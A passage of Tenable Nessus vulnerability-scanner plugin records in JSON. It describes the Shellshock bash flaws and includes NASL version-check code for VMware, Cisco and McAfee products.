VMware Horizon Workspace affected versions:\n# 1.5.0 - 1.5.2\n# 1.8.0 - 1.8.2\nif (app == \"VMware Horizon Workspace\" && version !~ \"^1\\.[58]\\.[0-2]$\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n# VMware Workspace Portal affected versions:\n# 2.0.0 and 2.1.0\nelse if (app == \"VMware Workspace Portal\" && version !~ \"^2\\.[01]\\.0$\")\n audit(AUDIT_INST_VER_NOT_VULN, app, version);\n\nvuln = FALSE;\nif 
(rpm_check(release:\"SLES11\", sp:2, reference:\"bash-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"bash-doc-3.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"libreadline5-32bit-5.2-147.14.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"readline-doc-5.2-147.14.22.1\")) vuln = TRUE;\n\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-32bit-5.2-147.22.1\")) vuln = TRUE;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) vuln = TRUE;\n\nif (!vuln) audit(AUDIT_HOST_NOT, \"affected because the packages are up-to-date\");\n\n\nif (report_verbosity > 0)\n{\n report = '\\n' + 'The remote ' + app + ' appliance has one or more outdated packages :' +\n '\\n' +\n rpm_report_get();\n security_hole(port:0, extra:report);\n}\nelse security_hole(0);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:25", "description": "According to its self-reported version number, the version of Cisco Prime Security Manager installed on the remote host is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-03T00:00:00", "type": "nessus", "title": "Cisco Prime Security Manager GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:cisco:prime_security_manager"], "id": "CISCO-SA-CSCUR01959-PRSM.NASL", "href": "https://www.tenable.com/plugins/nessus/78828", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78828);\n script_version(\"1.18\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01959\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco Prime Security Manager GNU Bash Environment Variable Handling Command Injection (cisco-sa-20140926-bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The management application installed on the remote host is affected by\na command injection 
vulnerability known as Shellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the version of Cisco\nPrime Security Manager installed on the remote host is affected by a\ncommand injection vulnerability in GNU Bash known as Shellshock. The\nvulnerability is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. This\nallows a remote attacker to execute arbitrary code via environment\nvariable manipulation depending on the configuration of the system.\");\n # https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20140926-bash\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?df19d2c1\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Cisco Prime Security Manager 9.3.2.1 (9) or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", 
value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:cisco:prime_security_manager\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"cisco_prsm_web_detect.nasl\");\n script_require_keys(\"installed_sw/Cisco PRSM\");\n script_require_ports(\"Services/www\", 443);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"http_func.inc\");\ninclude(\"install_func.inc\");\ninclude(\"cisco_func.inc\");\n\napp = 'Cisco PRSM';\n\nport = get_http_port(default:443, embedded:TRUE);\n\ninstall = get_single_install(app_name:app, port:port, exit_if_unknown_ver:TRUE);\nbase_url = build_url(qs:install['path'], port:port);\nver = install['version'];\n\nfix = '9.3.2.1 (9)';\n\n# Versions 9.1.x, 9.2.x, and 9.3.x below 9.3.2.1 (9) are vulnerable\nif (\n cisco_gen_ver_compare(a:ver, b:\"9.1.0\") >= 0 &&\n cisco_gen_ver_compare(a:ver, b:fix) < 0\n)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + base_url +\n '\\n Installed version : ' + ver +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else security_hole(port);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, app, base_url, ver);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:59:25", "description": "The remote host has a version of McAfee Next Generation Firewall (NGFW) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. 
The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-13T00:00:00", "type": "nessus", "title": "McAfee Next Generation Firewall GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:ngfw"], "id": "MCAFEE_NGFW_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79234", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79234);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Next Generation Firewall GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Next Generation Firewall\n(NGFW) 
installed that is affected by a command injection vulnerability\nin GNU Bash known as Shellshock. The vulnerability is due to the\nprocessing of trailing strings after function definitions in the\nvalues of environment variables. This allows a remote attacker to\nexecute arbitrary code via environment variable manipulation depending\non the configuration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant hotfix referenced in the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/13\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:ngfw\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_ngfw_version.nbin\");\n script_require_keys(\"Host/McAfeeNGFW/version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Next Generation Firewall\";\nversion = get_kb_item_or_exit(\"Host/McAfeeNGFW/version\");\n\n# Determine fix.\nif (\n version =~ \"^[2-4]\\.\" ||\n version =~ \"^5\\.[0-3]\\.\"\n) fix = \"5.3.11.9128\";\nelse if (version =~ \"^5\\.[45]\\.\") fix = \"5.5.11.9904\";\nelse if (version =~ \"^5\\.7\\.\") fix = \"5.7.5.11048\";\nelse if (version =~ \"^5\\.8\\.\") fix = \"5.8.0.12042\";\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n port = 0;\n\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fix +\n '\\n';\n security_hole(extra:report, port:port);\n }\n else security_hole(port);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, version);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-05T00:00:50", "description": "The remote host has a version of McAfee Web Gateway (MWG) installed that is affected by a command injection vulnerability in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. 
This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-11-12T00:00:00", "type": "nessus", "title": "McAfee Web Gateway GNU Bash Code Injection (SB10085) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/a:mcafee:web_gateway"], "id": "MCAFEE_WEB_GATEWAY_SB10085.NASL", "href": "https://www.tenable.com/plugins/nessus/79215", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(79215);\n script_version(\"1.13\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"MCAFEE-SB\", value:\"SB10085\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"McAfee Web Gateway GNU Bash Code Injection (SB10085) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host is affected by a code injection vulnerability known as\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote host has a version of McAfee Web Gateway (MWG) installed\nthat is affected by a command injection vulnerability in GNU Bash\nknown as Shellshock. 
The vulnerability is due to the processing of\ntrailing strings after function definitions in the values of\nenvironment variables. This allows a remote attacker to execute\narbitrary code via environment variable manipulation depending on the\nconfiguration of the system.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=SB10085\");\n script_set_attribute(attribute:\"see_also\", value:\"https://kc.mcafee.com/corporate/index?page=content&id=KB83022\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/post/shellshock/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the relevant patch per the vendor advisory.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/11/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"combined\");\n 
script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mcafee:web_gateway\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"mcafee_web_gateway_detect.nbin\");\n script_require_keys(\"Host/McAfee Web Gateway/Version\", \"Host/McAfee Web Gateway/Display Version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\napp_name = \"McAfee Web Gateway\";\nversion = get_kb_item_or_exit(\"Host/McAfee Web Gateway/Version\");\nversion_display = get_kb_item_or_exit(\"Host/McAfee Web Gateway/Display Version\");\n\nfix = FALSE;\n\nif (\n version =~ \"^6\\.\" ||\n version =~ \"^7\\.[0-4]\\.\"\n)\n{\n fix_display = \"7.4.2.3 Build 18233 / 7.5.0\";\n fix = \"7.4.2.3.0.18233\";\n}\n\nif (fix && ver_compare(ver:version, fix:fix, strict:FALSE) == -1)\n{\n if (report_verbosity > 0)\n {\n report =\n '\\n Installed version : ' + version_display +\n '\\n Fixed version : ' + fix_display +\n '\\n';\n security_hole(extra:report, port:0);\n }\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_INST_VER_NOT_VULN, app_name, version_display);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-04-28T16:13:50", "description": "The remote VMware ESX host is affected by multiple vulnerabilities in the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash known as Shellshock. The vulnerability is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system. 
(CVE-2014-6271, CVE-2014-7169, CVE-2014-6277, CVE-2014-6278)\n\n - An out-of-bounds read error exists in the redirection implementation in file parse.y when evaluating untrusted input during stacked redirects handling. A remote attacker can exploit this to cause a denial of service or possibly have other unspecified impact.\n (CVE-2014-7186)\n\n - An off-by-one overflow condition exists in the read_token_word() function in file parse.y when handling deeply nested flow control structures. A remote attacker can exploit this, by using deeply nested for-loops, to cause a denial of service or possibly execute arbitrary code. (CVE-2014-7187)", "cvss3": {"score": null, "vector": null}, "published": "2015-12-30T00:00:00", "type": "nessus", "title": "VMware ESX Multiple Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:vmware:esx:4.0", "cpe:/o:vmware:esx:4.1"], "id": "VMWARE_VMSA-2014-0010_REMOTE.NASL", "href": "https://www.tenable.com/plugins/nessus/87680", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(87680);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"VMSA\", value:\"2014-0010\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", 
value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"VMware ESX Multiple Bash Vulnerabilities (VMSA-2014-0010) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote VMware ESX host is missing a security-related patch.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote VMware ESX host is affected by multiple vulnerabilities \nin the Bash shell :\n\n - A command injection vulnerability exists in GNU Bash\n known as Shellshock. The vulnerability is due to the\n processing of trailing strings after function\n definitions in the values of environment variables. This\n allows a remote attacker to execute arbitrary code via\n environment variable manipulation depending on the\n configuration of the system. (CVE-2014-6271,\n CVE-2014-7169, CVE-2014-6277, CVE-2014-6278)\n\n - A out-of-bounds read error exists in the redirection\n implementation in file parse.y when evaluating\n untrusted input during stacked redirects handling. A\n remote attacker can exploit this to cause a denial of\n service or possibly have other unspecified impact.\n (CVE-2014-7186)\n\n - An off-by-one overflow condition exists in the\n read_token_word() function in file parse.y when handling\n deeply nested flow control structures. A remote attacker\n can exploit this, by using deeply nested for-loops, to\n cause a denial of service or possibly execute arbitrary\n code. 
(CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.vmware.com/security/advisories/VMSA-2014-0010\");\n script_set_attribute(attribute:\"see_also\", value:\"http://lists.vmware.com/pipermail/security-announce/2014/000278.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://seclists.org/oss-sec/2014/q3/650\");\n # https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?dacf7829\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.invisiblethreat.ca/2014/09/cve-2014-6271/\");\n # http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-cracked.html\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?e40f2f5a\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply the appropriate patch according to the vendor advisory that\npertains to ESX version 4.0 / 4.1.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'CUPS Filter Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"in_the_news\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2014/10/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/12/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.0\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:esx:4.1\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Misc.\");\n\n script_copyright(english:\"This script is Copyright (C) 2015-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"vmware_vsphere_detect.nbin\");\n script_require_keys(\"Host/VMware/version\", \"Host/VMware/release\");\n script_require_ports(\"Host/VMware/vsphere\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\n\nver = get_kb_item_or_exit(\"Host/VMware/version\");\nrel = get_kb_item_or_exit(\"Host/VMware/release\");\nport = get_kb_item_or_exit(\"Host/VMware/vsphere\");\n\npci = FALSE;\npci = get_kb_item(\"Settings/PCI_DSS\");\n\nif (\"ESX \" >!< rel)\n audit(AUDIT_OS_NOT, \"VMware ESX\");\n\nesx = \"ESXi\";\n\nextract = eregmatch(pattern:\"^ESX (\\d\\.\\d).*$\", string:ver);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_APP_VER, \"VMware ESX\");\nelse\n ver = extract[1];\n\n# fixed build numbers are the same for ESX and ESXi\nfixes = make_array(\n \"4.0\", \"2167889\",\n \"4.1\", \"See vendor\"\n );\n\nfix = FALSE;\nfix = fixes[ver];\n\n# get the build before checking the fix for the most complete audit trail\nextract = eregmatch(pattern:'^VMware ESX.* build-([0-9]+)$', string:rel);\nif (isnull(extract))\n audit(AUDIT_UNKNOWN_BUILD, \"VMware ESX\", ver);\n\nbuild = int(extract[1]);\n\n# if there is no fix in the array, fix is FALSE\nif(!fix)\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESX\", ver, build);\n\nif (!pci && fix == \"See vendor\")\n audit(AUDIT_PCI);\n\nvuln = FALSE;\n\n# This is for PCI 
reporting\nif (pci && fix == \"See vendor\")\n vuln = TRUE;\nelse if (build < fix )\n vuln = TRUE;\n\nif (vuln)\n{\n if (report_verbosity > 0)\n {\n report = '\\n Version : ESX ' + ver +\n '\\n Installed build : ' + build +\n '\\n Fixed build : ' + fix +\n '\\n';\n security_hole(port:port, extra:report);\n }\n else\n security_hole(port:port);\n\n exit(0);\n}\nelse\n audit(AUDIT_INST_VER_NOT_VULN, \"VMware ESX\", ver, build);\n", "cvss": {"score": 10, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-04T23:58:14", "description": "According to its self-reported version, the remote NX-OS device is affected by a command injection vulnerability in GNU Bash known as Shellshock, which is due to the processing of trailing strings after function definitions in the values of environment variables. This allows a remote attacker to execute arbitrary code via environment variable manipulation depending on the configuration of the system.", "cvss3": {"score": null, "vector": null}, "published": "2014-10-27T00:00:00", "type": "nessus", "title": "Cisco NX-OS GNU Bash Environment Variable Command Injection Vulnerability (cisco-sa-20140926-bash) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-6277", "CVE-2014-6278", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-01-31T00:00:00", "cpe": ["cpe:/o:cisco:nx-os"], "id": "CISCO-SA-20140926-BASH-NXOS.NASL", "href": "https://www.tenable.com/plugins/nessus/78693", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78693);\n script_version(\"1.16\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/31\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-6277\",\n \"CVE-2014-6278\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_bugtraq_id(\n 70103,\n 70137,\n 70152,\n 70154,\n 70165,\n 70166\n );\n script_xref(name:\"IAVA\", 
value:\"2014-A-0142\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur01099\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur04438\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur04510\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05529\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05610\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur05017\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCuq98748\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02102\");\n script_xref(name:\"CISCO-BUG-ID\", value:\"CSCur02700\");\n script_xref(name:\"CISCO-SA\", value:\"cisco-sa-20140926-bash\");\n script_xref(name:\"CERT\", value:\"252743\");\n script_xref(name:\"EDB-ID\", value:\"34765\");\n script_xref(name:\"EDB-ID\", value:\"34766\");\n script_xref(name:\"EDB-ID\", value:\"34777\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Cisco NX-OS GNU Bash Environment Variable Command Injection Vulnerability (cisco-sa-20140926-bash) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote device is running a version of NX-OS that is affected by\nShellshock.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version, the remote NX-OS device is\naffected by a command injection vulnerability in GNU Bash known as\nShellshock, which is due to the processing of trailing strings after\nfunction definitions in the values of environment variables. 
